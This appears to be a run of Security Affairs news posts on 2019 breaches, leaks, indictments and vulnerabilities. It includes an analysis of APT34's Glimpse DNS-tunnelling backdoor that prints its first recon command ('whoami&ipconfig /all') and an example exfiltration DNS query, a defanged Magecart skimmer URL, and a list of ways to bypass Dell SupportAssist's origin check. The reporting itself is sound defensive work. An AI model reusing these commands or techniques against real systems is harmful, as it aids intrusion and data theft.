The name 10KBLAZE comes by the fact that organizations hit by attacks would need to disclose their impact to the U.S. Securities and Exchange Commission (SEC) in their annual 10-K filing.

“Based on publicly available data provided by SAP, Onapsis estimates that approximately 50,000 companies and a collective 1,000,000 systems are currently using SAP NetWeaver and S/4HANA.” reads the report published by the experts. “Onapsis research gathered over ten years calculates that nearly 90% of these systems, approximately 900,000, may suffer from the misconfigurations for which these exploits are now publicly available,”

Researchers also found many SAP systems exposed on the internet that could be hit by remote, unauthenticated attackers.

Organizations have to check their configurations to prevent such kind of attacks.

Pierluigi Paganini

(SecurityAffairs – 10KBLAZE , Genesis Store)

The post 10KBLAZE exploits could affect 9 out of 10 SAP installs of more than 50k customers appeared first on Security Affairs.

Ladders Database Exposed 13M User Records

Employment-recruitment site Ladders exposed 13M User Records

Employment-recruitment site Ladders exposed left online a misconfigured AWS-hosted database that contained 13 million user records.

Sanyam Jain, a security researcher and a member of the GDI Foundation, discovered a database belonging to the employment-recruitment site Ladders left exposed online on a misconfigured AWS-hosted database.

The archive contained 13 million user records, data related to job seekers who had signed up for the service. Exposed records included contact details, current compensation, and applicants’ employment histories.

“Ladders, one of the most popular job recruitment sites in the U.S. specializing in high-end jobs, has exposed more than 13.7 million user records following a security lapse.” reads a report published by
TechCrunch.

“The New York-based company left an Amazon -hosted Elasticsearch database exposed without a password, allowing anyone to access the data.”

Ladders, data leak
Source Techcrunch.com

TechCrunch reported the discovery to company that quickly secured the database.

“AWS confirms that our AWS Managed Elastic Search is secure, and is only accessible by Ladders employees at indicated IP addresses. We will look into this potential theft, and would appreciate your assistance in doing so,” said Marc Cenedella, founder and CEO of Ladders.

Experts confirmed that the database contained years’ worth of records.

Pierluigi Paganini

(SecurityAffairs – AWS, data leak)

The post Ladders Database Exposed 13M User Records appeared first on Security Affairs.

Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme

The US DoJ indicted a Russian national for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

The US DoJ indicted the Russian national Anton Bogdanov for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

Bogdanov was charged in federal court in Brooklyn of wire fraud conspiracy, aggravated identity theft and computer intrusion in connection with a scheme in which he and other crooks used stolen personal information to file federal tax returns and fraudulently obtain more than $1.5 million in tax refunds from the Internal Revenue Service.

The Russian man was arrested in Phuket, Thailand, on November 28, 2018 and was extradited to the United States in March 2019. 

“As alleged in the indictment, Bogdanov and his co-conspirators combined sophisticated computer hacking and identity theft with old-fashioned fraud to steal more than $1.5 million from the U.S. Treasury,” stated United States Attorney Donoghue.  “This Office, together with our law enforcement partners, will use all our available resources to target and bring cybercriminals to justice, wherever they are.”

According to the indictment, between June 2014 and November 2016,
Anton Bogdanov and his co-conspirators compromised computer systems of private tax preparation firms in the United States and stole personally identifiable information (PII) (including Social Security numbers and dates of birth) of the victims.

Crooks used stolen data to impersonate the victims and modified the tax returns to ensure that the refunds are paid to their prepaid debit cards.

“Bogdanov and his co-conspirators also used misappropriated PII to obtain prior tax filings of victims from an IRS website, and filed new tax returns, purportedly on behalf of the victims, so that refunds were paid to prepaid debit cards under their control.” reads the press release published by the DoJ. “The debit cards were cashed out in the United States, and a percentage of the proceeds was wired to Bogdanov in Russia.”

Anton Bogdanov

According to the investigators, the debit cards were cashed out in the United States, while Bogdanov received a percentage of the proceeds in Russia.

If convicted of the charges, Anton Bogdanov could face up to 27 years’ imprisonment.

Pierluigi Paganini

(SecurityAffairs – Anton Bogdanov, cybecrime)



The post Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme appeared first on Security Affairs.

APT34: Glimpse project

The APT34 Glimpse project is maybe the most complete APT34 project known so far, the popular researcher Marco Ramilli analyzed it for us.

Indeed we might observe a File-based command and control (a quite unusual solution) structure, a VBS launcher, a PowerShell Payload and a covert channel over DNS engine. This last feature is the most appreciated characteristics attributed to APT34. But let’s move on and start a quick analysis on it.

Context:

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19 2019 researchers at Chronicle, a security company owned by Google’s parent company, Alphabet, have examined the leaked tools, exfiltrated the past week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset also has been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

Today I’d like to focus my attention on the Glimpse project since, in my personal opinion, it could be considered as the “stereotype” of APT34 (with the data we ‘ve got so far).

The Glimpse Project

The package comes with a README file having as a name “Read me.txt” (note the space). The name per se is quite unusual and the content is a simple guide on how to set a nodejs server and a Windows server who would run the “stand alone” .NET (>v4) application to control infected machines. The infection start by propagating a .VBS script called “runner_.vbs” which is a simple runner of a most sophisticated powershell payload. The Powershell payload is a quite complex script acting several functions. The following image shows its “deobfuscated” main loop.

Glimpse Infection Payload Main Loop

The payload loops waiting for instructions, once a command comes from C2 it starts to perform specific actions and it answers back to C2 by requesting crafted subdomains based on variable $aa_domain_bb. One of the most important functions the payload has implemented is to drop and execute additional toolsets. Indeed this payload is mainly a delivery module with some additional controls entirely based on DNS covert channel.

The $aa_domain_bb variable contains the main domain name for which the C2 acts as authoritative Domain Name Server. While no actions are coming from C2 the infected agent would just periodically “ping” C2 by giving basic informations regarding the victim machines. For example the function aa_ping_response_bb would compose an encoded DNS message ( aa_text_response_bb ) which sends it own last IP address. At this stage we might appreciate two communication ways. The first communication channel comes from the subdomain generation for example: 59071Md8200089EC36AC95T.www.example.com while a second communication channel comes from TXT DNS record such as: control: 95 – ackNo: 0 – aid: 59071d8289 – action: M >>> 59071Md8200089EC36AC95T. Both of them are implemented to carry different informations. One of the most important function is the aa_AdrGen_bb which is the communication manager. It implements the control layer in order to send and to receive control informations such as: commands, bytes received, if the file transfer has been close, and so on and so forth. The decoded actions are stored into the variable aa_act_bb and are the following ones:

Command and Control. Env creation for new connected agents
  • M. If the agent is already registered to C2 this command acts like a ping, it updates basic informations to the corresponding “agent” folder. If it’s the first time the agent connects back to C2 it starts a registration section which enables, server side (command and control side) the building up of an dedicated folders and file environment. Please check the previous image: Command and Control. Env creation for new connected agents.
  • W. This is a TXT request to list the waiting commands (or, if you wish “kind of jobs”). The first command that is executed after the registration phase is the command tagged as 10100 having as a content: “whoami&ipconfig /all”
  • D. Is actually what should be executed. It takes as input the tagged task and it forwards to the requesting Agent the Base64 encoded content of the file.
  • 0. It is not a TXT request. This request makes the authoritative DNS (the command and control) answers to the agent the requested file in the waiting folder. Answering back an A record having as data field a crafted ip (11.24.237.110) if no “actions” (fileS) are in the waiting folder the C2 answers back an A record value having as data field “24.125.” + fileNameTmp.substring(0, 2) + “.” + fileNameTmp.substring(2, 5); and time to live a random number between 0 to 360.
  • 1. It is not a TXT request. This request makes the authoritative DNS (the command and control) answer back with the file content. It implements a multiple answering chain, according to RFC4408, to send files greater than 255 characters.
  • 2. It is not a TXT request. This requests makes the authoritative DNS (the command and control) to receive a file from the Agent. It implements a complex multi-part chain for reconstructing partials coming from domain name requests. After sending all of the data, the Agent will issue a final DNS query with “COCTabCOCT” in the data segment. This query notifies the C2 server that the Trojan has finished sending the contents of the file.
Command and Control: COCTabCOCT end of communication

The following image shows a running example of the infection chain run on a controlled virtual environment.You might appreciate the communication layers over the requested domains. For example the following requests would carry on data in subdomain, while the answered IP gives a specific affermative/negative response.

10100*9056*****************.33333210100A[.]example[.]com

Glimpse running environment

The command and control is implemented by a standalone .NET application working through files. The backend, a nodeJS server, runs and offers Public API and and saves, requests to agents, and results from agents, directly into files named with “UID-IP” convention acting as agent ID. The panel reads those files and implements stats and actions. The following image shows the static configuration section in the C2 panel.

Command and Control Panel Hardcoded Settings

The Control Panel is mainly composed by two .NET Window components. Main Windows where the list of connected Agents is shown within additional informations such as: Agent ID, Agent IP, Agent Last Online Time and Attacker Comments. And Control Window which is called once the attacker clicks on the on a selected Agent. The event onClick spawn the following code:

controlPanel = new controlPanel(agent.id, agent.ip, agent.lastActivity);
controlPanel.Show();

After its initialisation phase the control panel enables the attacker to write or to upload a list of commands or a file within commands to agents. The following image shows the controPanel function which takes commands from inputs “TextFields”, creates a new file into the waiting folder within commands. The contents of such a folder will be dropped on the selected Agent and executed.

Command and Control, controlPanel insert_command function

The controlPanel offers many additional functionalities to better control single or group of Agents. By focusing on trying to give a project date we might observe the compiled time which happens to be 9/1/2018 at 5:13:02 AM for newPanel-dbg.exe while it happens to be 9/8/2018 at 8:01:54 PM for the imported library called ToggleSwitch.dll.

With High probability we are facing a multi-modular attacking framework where on one side the DNS communication channel delivers commands to the target Agents and on the other side many control panels could be developed and attached to the DNS communication system. It would be quite obvious if you look to that framework as a developer, thus the DNS communication channel uses files to store informations and to synchronise actions and agents, so that many C2 could be adapted to use it as a communication channel. We might think that that many APT34 units would be able to reuse such a communication channel. Another interesting observation might come from trying to date that framework. A powershell Agent as been leaked on PasteBin o August 2018 (take a look here) by an anonymous user and seen, since today, from very few people (197 so far). The used command and control has been compiled the month before (July 2018). The developing technologies (.NET, nodeJS) are very different and the implementation styles differ as well. DNS Communication channel is developed in linear and more functional driven programming style, while the standalone command and control is developed using a little bit more sophisticated object oriented programming with a flavour of agent-oriented programming: the attacker considers the object agentt as an independent agent working without direct control. The attacker writes files as the medium to address the Agent behaviour.

The original post was published on the Marco Ramilli’s blog:

https://marcoramilli.com/2019/05/02/apt34-glimpse-project/

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, Glimpse project)

The post APT34: Glimpse project appeared first on Security Affairs.

Magecart Group 12 also targets Opencart-based online stores

Magecart made the headlines again, Magecart Group 12 is conducting a large-scale operation that targets OpenCart online stores.

According to security experts at RiskIQ, the Magecart Group 12 is behind a large-scale operation against OpenCart online stores. The attackers used stealth tactics to remain under the radar and siphon payment data from compromised e-commerce sites.

Security firms have monitored the activities of a dozen Magecart groups at least since 2015. The gangs use to implant skimming script into compromised online stores in order to steal payment card data on, but they are quite different from each other. 

According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British AirwaysNeweggTicketmaster, and Feedify​​

OpenCart is in the most popular e-commerce platforms worldwide that is currently used by thousands of online stores of any size. OpenCart one of the top three e-commerce CMS, after Shopify and Magento, it is normal that crooks attempt to target it too.

Previous attacks carried out by the Magecart Group 12 hit e-commerce services used by thousands of online stores that ran versions of  Magento, OpenCart, and OSCommerce. The attacks against OpenCart-based stores is similar to the Magento ones.

“We’ll also break down a large-scale Magecart Group 12 campaign uncovered by RiskIQ researchers abusing the OpenCart platform, which is run by thousands of e-commerce sites.” reads the analysis published by RiskIQ. “Group 12 breached OpenCart sites to inject their skimmer similar to the Magento attacks, starting with the insertion of a very well-picked domain name: batbing[.]com.”

In the latest wave of attacks, Magecart group 12 injected their skimmer into OpenCart websites only after checking if the visitor accessed a checkout page. Technically they added the following pre-filter JavaScript code:

Magecart Group 12 OpenCart

Attackers used a domain name that attempts to impersonate the Bing.com search engine script.

“One other notable element of this attack is the impersonation attempt for the Bing.com search engine script: “

https://batbing[.]com/js/bat.min.js

The normal Bing URL looks very similar:

https://bat[.]bing[.]com/bat.js

RiskIQ with the support of AbuseCH and the Shadowserver Foundation took offline the domain used by the hackers.

Experts found references to the skimmer script in a forum post on the OpenCart forum.

RiskIQ experts believe that new types of web skimming attacks will be observed in the future, hackers will go beyond payment data attempting to steal login credentials and other sensitive information.

“It’s likely that new breeds of these web skimming attacks will emerge in the future, whether by new or existing Magecart groups. They’re currently focusing on payment data, but we’re already seeing moves to skim login credentials and other sensitive information.” concludes RiskIQ. “This widens the scope of potential Magecart victims far beyond e-commerce alone.”

Pierluigi Paganini

(SecurityAffairs – Magecart Group 12, OpenCart)

The post Magecart Group 12 also targets Opencart-based online stores appeared first on Security Affairs.

A ‘Cyber Event’ disrupted power grid operations in three US states

The Department of Energy confirmed that in March a cyber event disrupted power grid operations in California, Wyoming, and Utah.

The Department of Energy confirmed that on March 2019, between 9 a.m. and 7 p.m., a cyber event disrupted energy grid operations in California, Wyoming, and Utah.

The news was first reported by E&E News, a “cyber event” interrupted grid operations in parts of the western United States in March, according to a report posted by the Department of Energy.

The report states that interruptions of electrical system operations were observed in California (Kern County, Los Angeles County), Utah (Salt Lake County), Wyoming (Converse County). The report doesn’t include the name of the utility company that suffered the incident. It must be clear that a report of a cyber incident doesn’t necessarily imply that the company has been hacked, in some cases human errors or system misconfigurations could be the root causes of a cyber incident.

power grid incident

U.S. utilities are required to notify DOE within one hour of a cyber attack against their systems. DoE could fine up to $2,500 per day power companies that fail to file an OE-417 electric disturbance report.

Media outlets like E&E News and Motherboard correctly defined the report as cryptic, Department of Energy has not responded to a request by Motherboard for more information about the cyber event.

“A “cyber event,” according to infrastructure hacking experts, could be anything from hackers messing with the grid remotely, to a much less dramatic hardware or software bug.” reported MotherBoard.

Anyway, if confirmed that hackers remotely interfered with power grid networks in the US, the event would be unprecedented for the country. The unique power grid hacks recognized by the cyber security community is the one that caused massive power outages in Ukraine in 2015 and in 2016.

The E&E News cited for instance the incident occurred in January 2018 at a Michigan utility Consumers Energy. It filed the same type of DOE notice when an employee in training accidentally caused a blackout for about 15,000 people (Energywire, March 8, 2018).

“There was no malicious intent” in that case, a spokeswoman said at the time, and Consumers Energy brought the lights back on within a few hours.

Cyber attacks against critical infrastructures, including power grids, are dangerous threats and possible consequences are unpredictable, for this reason, it is essential to share knowledge about attacks and attackers’ TTPSs.

Pierluigi Paganini

(SecurityAffairs – power grid, hacking)

The post A ‘Cyber Event’ disrupted power grid operations in three US states appeared first on Security Affairs.

How to Hack Dell computers exploiting a flaw in pre-installed Dell SupportAssist

A flaw in Dell SupportAssist, a pre-installed tool on most Dell computers, could be exploited by hackers to compromise them remotely.

The security researcher Bill Demirkapi (17) has discovered a critical remote code execution vulnerability in the Dell SupportAssist utility that is pre-installed on most Dell computers.

The vulnerability could be exploited by hackers to compromise systems remotely.

Dell SupportAssist software is described as a tool that proactively checks the health of system’s hardware and software. When an issue is detected, the necessary system state information is sent to Dell for troubleshooting.

To solve the problems Dell SupportAssist interacts with the Dell Support website and automatically detect Service Tag or Express Service Code of Dell product.

The utility performs hardware diagnostic tests and analyzes the hardware configuration of the system, including installed device drivers, and is able to install missing or available driver updates.

Dell SupportAssist tool

The software leverages a local web service that is protected using the “Access-Control-Allow-Origin” response header and implementing restrictions to accept commands only from the “dell.com” website or its subdomains,

On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest. ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks” reads the analysis published by Bill Demirkapi.

“An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell.”

Demirkapi discovered that it is possible to bypass the protections implemented by Dell and download and execute malicious code from a remote server under the control of the attackers.

To bypass the Referer/Origin check, we have a few options:

  1. Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to find one on the sites designated for SupportAssist)
  2. Find a Subdomain Takeover vulnerability
  3. Make the request from a local program
  4. Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.”

Dell acknowledged the flaw as explained in a security advisory and released a security update to address it:

“An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables via SupportAssist client from attacker hosted sites,” reads the advisory.

The remote code execution flaw, tracked as CVE-2019-3719, affects Dell SupportAssist Client versions prior to version 3.2.0.90.

The expert published a video PoC of the hack and the source code of the proof of concept:

Pierluigi Paganini

(SecurityAffairs – Dell SupportAssist, hacking)


The post How to Hack Dell computers exploiting a flaw in pre-installed Dell SupportAssist appeared first on Security Affairs.

Tenable experts found 15 flaws in wireless presentation systems

Experts at Tenable discovered 15 vulnerabilities in eight wireless presentation systems, including flaws that can be exploited to remotely hack devices.

Wireless presentation systems are used to display content on a screen or through several devices, including mobile devices and laptops. These systems are widely used in enterprises and educational organizations.

Researchers at Tenable discovered 15 vulnerabilities in eight wireless presentation systems, some of them can be exploited for command injection and for gaining access to a device.

“Tenable found multiple vulnerabilities while investigating a Crestron AM-100. Tenable also discovered that the Crestron AM-100 shared a code base with the Barco wePresent, Extron ShareLink, InFocus LiteShow, TEQ AV IT WIPS710, SHARP PN-L703WA, Optoma WPS-Pro, Blackbox HD WPS, and possibly others.” reads the analysis published by Tenable. “The vulnerabilities listed below do not affect all devices”

The experts focused their tests on Crestron AirMedia AM-100 and AM-101 products, but systems from other vendors could be affected because these devices reuse portions of code. Experts discovered that some of the issues they discovered also impact Barco wePresent, Extron ShareLink, InFocus LiteShow, TEQ AV IT WIPS710, SHARP PN-L703WA, Optoma WPS-Pro, Blackbox HD WPS, and potentially other vendors.

wireless presentation systems

Several flaws could be exploited by a remote, unauthenticated attacker to inject operating system commands. Others issues can be exploited by
a remote, unauthenticated attacker to change admin and moderator passwords and view presentations.

The issues, including a hardcoded session ID, allow unauthenticated, remote attacker to stop, start, and disconnect any screen sharing session due to insufficient authentication checking in the moderator controls. 

Experts also found a denial-of-service (DoS) flaw and credentials stored in plain text that could be accessible to authenticated users.

Searching for Crestron AirMedia devices exposed online with Shodan, we can find hundreds of devices, most of them located in the US, followed by Canada and Finland.

Tenable started reporting the vulnerabilities to vendors in January, but at the time of the public disclosure, only Extron and Barco have released firmware updates.

Waiting for the fix, users have to configure their environments to avoid these systems being exposed to the internet.

Pierluigi Paganini

(SecurityAffairs – wireless presentation systems, hacking)

The post Tenable experts found 15 flaws in wireless presentation systems appeared first on Security Affairs.

Citrix confirmed hackers had access to its network for five months

Citrix confirmed that the hackers who breached its network stole sensitive personal information of both former and current employees for about six months.

In March, the American multinational software company Citrix disclosed a security breach, according to the firm an international cyber criminals gang gained access to its internal network. Experts at cybersecurity firm Resecurity attributed the attack to Iranian threat actors.

Hackers were able to steal business documents, but its products or services were not impacted by the attack.

Citrix discovered the intrusion after being notified by the FBI on March 6, 2019, the company announced to have secured its network and hired a forensic firm to assist with a forensic investigation of the incident.

Now the software giant Citrix provided more details about the data breach and confirmed that hackers had access to its network for roughly five months.

This week Citrix submitted a notice of data breach to the California Office of the Attorney General explaining that attackers had intermittent access to its network between October 13, 2018, and March 8, 2019.

The attackers exfiltrated files from company systems, some of them stored information on current and former employees. Exposed data includes names, social security numbers, and financial information.

“We currently believe that the cyber criminals had intermittent access to our network between October 13, 2018 and March 8, 2019 and that they removed files from our systems, which may have included files containing information about our current and former employees and, in limited cases, information about beneficiaries and/or dependents.” reads the notice of data breach sent by Citrix.

Citrix

At the time of writing it is still unclear how many people have been impacted by the data breach.

The California’s Civil Code 1798.82(a) obliges companies to report data breaches to the state’s Attorney General if more than 500 California residents are impacted. This implies that even if Citrix did not provide the total number of affected employees in the notice, at least 500 state’s residents are affected.

The company is notifying all potentially impacted individuals and providing them with free credit monitoring and fraud protection services.

“Additionally, and as a precaution, we have arranged for you, at your option, to enroll in Equifax ID Patrol, a complimentary one-year credit monitoring, dark web monitoring, and identity restoration service. ” continues the notice.

In early April, Citrix revealed that hackers likely breached its network via password spraying, that means that hackers attempted to access the accounts using commonly used passwords.

“We identified password spraying, a technique that exploits weak passwords, as the likely method by which the threat actors entered our network.” reads a blog post published by Citrix.

Pierluigi Paganini

(SecurityAffairs – Citrix, data breach)

The post Citrix confirmed hackers had access to its network for five months appeared first on Security Affairs.

Victims of ZQ Ransomware can decrypt their files for free

Good news for the victims of the ZQ Ransomware, security experts at Emisisoft have released a free decryptor tool.

Good news for the victims of the ZQ Ransomware, security experts at Emisisoft have released a free decryptor tool that allows them to decrypt files for free.

ZQ Ransomware infected users in the US, India, Polland, Brazil and the UK.

The ZQ Ransomware encrypts victim’s files using the Salsa20 and RSA-1024 algorithms. The malware adds the extension “.[w_decrypt24@qq.com].zq” to the encrypted files.

The ransomware drops a ransom note “{HELP__DECRYPT}.txt” on the victims’ machines, it includes payment instructions. Victims can contact operators behind the ransomware sending a message to the email address “w_decrypt24@qq.com”.

“Below the text of the ransom note “All of _our files are encr_pted* to decr_pt them write me to email::w_decrypt24@qq.com
Your key:
[
redacted]”

ZQ ransomware

In order to decrypt the files, victims need to provide an encrypted file and original file to decrypt. The Decryptor tool is available at the following link:

https://www.emsisoft.com/decrypter/zq

Below the step by step procedure:

  1. IMPORTANT! Make sure you remove the malware from your system first, otherwise it will repeatedly lock your system or encrypt files.
  2. Download the free Emsisoft Decrypter for ZQ.
  3. Run the executable and confirm the license agreement when asked.
  4. Click “Start” to decrypt your files. Note that this may take a while.
  5. All done! Gotta crypt ’em all!

Emsisoft has recently released several tools to help victims of several ransomware, including the CryptoPokemon ransomware, the Planetary Ransomware, the Hacked Ransomware, and the PewDiePie ransomware.

Pierluigi Paganini

(SecurityAffairs – ransomware, decryptor)

The post Victims of ZQ Ransomware can decrypt their files for free appeared first on Security Affairs.

Julian Assange sentenced to 50 weeks in jail

Julian Assange has been sentenced to 11 months in prison for breaching his bail conditions in 2012 and finding asylum into
Ecuadorian embassy for more than seven years.

WikiLeaks founder Julian Assange has been sentenced to 50 weeks in prison for breaching his bail conditions in 2012 and finding asylum into Ecuador’s London embassy for more than seven years.

On April 2018, WikiLeaks founder Julian Assange has been arrested at the Ecuadorian Embassy in London. after Ecuador withdrew asylum after seven years.

Seven years ago, WikiLeaks founder Julian Assange took refuge in the embassy to avoid extradition to Sweden over a sexual assault case.

In 2012 a British judge ruled WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and spent the last years in its London embassy.

Julian Assange arrest
Wikileaks founder Julian Assange is arrested at the Ecuadorian embassy in London

Immediately after his arrest, Assange was convicted at Westminster Magistrates’ Court of jumping the bail in June 2012 after the extradition order to Sweden.

In 2017, Sweden dropped the preliminary investigation into the rape accusation against Julian Assange, but Wikileaks founder remained into the Ecuadorian Embassy fearing of extradition to the United States.
Judge Deborah Taylor said that Assange’s conduct had cost 16 million pounds of British taxpayers money.

“Your continued residency has cost £16m of taxpayers’ money. No one is above the reach of the law.” said Judge Deborah Taylor while delivering sentence at Southwark

“It’s difficult to envisage a more serious example of this offence.”

“I have taken into account all that has been said on your behalf in mitigation, including the background history of this case which has been set out in some detail,” said HHJ Taylor as she summed up the case against Assange.”

“Whilst you may have had fears as to what may happen to you, nonetheless you had a choice, and the course of action you chose was to commit this offence in the manner and with the features I have already outlined. In addition, I reject the suggestion that your voluntary residence in the Embassy should reduce any sentence. You were not living under prison conditions, and you could have left at any time to face due process with the rights and protections which the legal system in this country provides.”

The lawyer read an Assange’s letter in the court, he is disappointed for “terrifying circumstances:”

“I apologize unreservedly to those who consider that I have disrespected them by the way I have pursued my case. This is not what I wanted or intended,” Assange added.

Pierluigi Paganini

(SecurityAffairs – Julian Assange)

The post Julian Assange sentenced to 50 weeks in jail appeared first on Security Affairs.

DHS BOD 19-02 directive – Critical flaws must be fixed within 15 Days

The US DHS issued a new Binding Operational Directive (BOD 19-02) instructing federal agencies and departments to patch critical flaws in within 15 days.

The U.S. Department of Homeland Security (DHS) issued a new Binding Operational Directive (BOD 19-02) ordering federal agencies and departments quickly patch serious vulnerabilities in Internet-facing systems.

The BOD 19-02 gives government organizations 15 days to address critical vulnerabilities, while high-severity flaws must be fixed within 30 days.

Review Cyber Hygiene reports issued by CISA and remediate the critical and high vulnerabilities detected on the agency’s Internet-accessible systems as follows:

  • Critical vulnerabilities must be remediated within 15 calendar days of initial detection.
  • High vulnerabilities must be remediated within 30 calendar days of initial detection.” reads the BOD.

BOD 19-02 replaces the previous 2015 BOD 15-01 (Critical Vulnerability Mitigation Requirement for Federal Civilian Executive Branch Departments and Agencies’ Internet-Accessible Systems) that gave the government agencies 30 days to address critical security holes.

DHS DNS hijacking

Government systems exposed online undergo Cyber Hygiene vulnerability assessment to help agencies identify flaws.

The Cybersecurity and Infrastructure Security Agency (CISA) provides regular reports to government agencies, reporting them the vulnerabilities detected during ordinary assessments.

The new BOD 19-02 also requests the CISA to provide guidance for remediation and share with monthly base information on the detected flaws with the Office of Management and Budget (OMB). Information sharing is essential to profile threats and implement necessary countermeasures.

“In support of BOD implementation, CISA leverages Cyber Hygiene scanning results to identify cross-government trends and persistent constraints, and works with the Office of Management and Budget (OMB) to help impacted agencies overcome technical and resource challenges that prevent the rapid remediation of vulnerabilities. ” reads the BOD 19-02.

The agencies that will not able to address the flaws in the timeframe established by the BOD 19-02 have to submit a remediation plan in three days. The remediation plan includes a detailed report on the constraints prevented the agency from addressing the flaws in time, and of course, provides an estimated completion date.

“The federal government must continue to enhance our security posture, reduce risks posed by vulnerable Internet-accessible systems, and build upon the success of BOD 15-01 by advancing federal requirements for high and critical vulnerability remediation to further reduce the attack surface and risk to federal agency information systems,” the DHS said.

The latest BOD 19-02 directive is a very important directive, however, we have to consider that 15 days is a very long time to wait before fixing flaws in government systems managing critical processes and sensitive data.

Pierluigi Paganini

(SecurityAffairs – DHS, BOD 19-02)

The post DHS BOD 19-02 directive – Critical flaws must be fixed within 15 Days appeared first on Security Affairs.

MIVD Dutch intelligence warns of Russian, Chinese cyber espionage

The Military Intelligence and Security Service (MIVD) warn of “worrying” cyber espionage activities carried out by Russia and China.


The Military Intelligence and Security Service (MIVD) warn of “worrying” cyber espionage activities carried out by Russia and China.

The warning is included in the annual report published by the Dutch intelligence that cited as an example to attack against the world chemical weapons watchdog. On September 2018, Dutch intelligence services arrested two alleged Russian spies that were planning to hack a Swiss laboratory where there was ongoing an investigation of the poisoning of the spy Sergei Skripal.

In April 2018 the Dutch authorities expelled four alleged agents from Russia’s GRU military intelligence agency for trying to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

According to the Military Intelligence and Security Service (MIVD), Russia is expanding its arsenal with cyber its cyber capabilities, Russia-linked APT groups are a threat to the Netherlands and all of European states.

MIVD

The AIVD sent a tweet indicating that an (official) English translation of the Annual Report 2018 will be released in a few weeks.

The popular cyber security researcher Matthijs Koot, published an unofficial translation of the Annual Report 2018 of the Dutch General Intelligence and Security Service (GISS, known in Dutch as AIVD)

The report described the cyber espionage activities carried out by foreign government “very worrying,” the Dutch news media outlet reported.

“The threat facing the armed forces is the theft of military technology and technological expertise, which can be used for both military and civil ends,”

“More and more countries are focusing on political and/or economic espionage. We see in our investigations that China, Iran and Russia are at the forefront of this. “

The way the Dutch intelligence disclosed the information is unusual, in the past counter-espionage operations were taken secret.

“That was necessary to increase the resilience of society, because less naivety means greater alertness to possible unwanted influences,” MIVD chief General Onno Eichelsheim said in the report.

The report pointed out that China was “actively attempting to gather military intelligence in the Netherlands”.

“The threat against defence is the stealing of military technological knowledge and technology that can be used both militarily and for civilian purposes.”

Military Intelligence and Security Service (MIVD) also warn that Iran, North Korea, Pakistan and Syria were also seeking “knowledge and goods” for their own weapons programmes in the Netherlands and other western countrie.

Dutch intelligence is urging defence companies to reinforce their security to repeal the growing threats.

Pierluigi Paganini

(SecurityAffairs – MIVD, intelligence)

The post MIVD Dutch intelligence warns of Russian, Chinese cyber espionage appeared first on Security Affairs.

Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware

Threat actors are exploiting a recently patched critical Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware to organizations.

Threat actors are delivering a new piece of malware, tracked as
Sodinokibi, by exploiting a recently patched Oracle WebLogic Server vulnerability.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology. The flaw initially received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

On April 26, Oracle addressed the flaw with the release of an out-of-band update.

The threat was detected and analyzed by several firms (i.e. South Korean EST Security, Cisco’s Talos), independent researchers, intelligence group.

“Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10.” reads the analysis published by Cisco Talos.” Attackers have been making use of this exploit in the wild since at least April 17. “

Sodinokibi ransomware

